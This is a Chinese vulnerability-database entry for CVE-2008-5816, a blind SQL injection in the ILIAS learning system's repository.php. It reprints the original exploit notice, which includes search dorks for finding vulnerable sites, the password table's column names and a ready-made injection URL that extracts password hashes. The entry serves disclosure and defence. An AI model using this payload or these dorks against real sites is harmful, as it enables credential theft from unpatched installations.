ILIAS 'repository.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117137 漏洞类型 SQL注入
发布时间 2008-12-24 更新时间 2009-01-29
CVE编号 CVE-2008-5816 CNNVD-ID CNNVD-200901-011
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7570
https://cxsecurity.com/issue/WLB-2009010007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-011
|漏洞详情
ILIAS是开源学习管理系统。ILIAS中的repository.php脚本存在SQL注入漏洞。远程攻击者可以借助ref_id参数,执行任意的SQL指令。
|漏洞EXP
###############################################################
#
#      ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability     
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, karamble, Free-Hack
#      Date:                        24.12.2008
#
###############################################################
#                                                             
#      Developer: http://www.ilias.de
#      Dork 1: "powered by ILIAS"
#      Dork 2: inurl:repository.php ilias
#      Description: The GET Parameter "ref_id" in "repository.php"
#		    contains a Blind SQL Injection Vulnerability
#
#      Usertable:         usr_data
#      Important columns: usr_id, login, passwd
#
#      Example:
#      http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--
#                                                             
###############################################################

# milw0rm.com [2008-12-24]
|参考资料

来源:XF
名称:ilias-repository-sql-injection(47615)
链接:http://xforce.iss.net/xforce/xfdb/47615
来源:BID
名称:33006
链接:http://www.securityfocus.com/bid/33006
来源:MILW0RM
名称:7570
链接:http://www.milw0rm.com/exploits/7570
来源:SREASON
名称:4858
链接:http://securityreason.com/securityalert/4858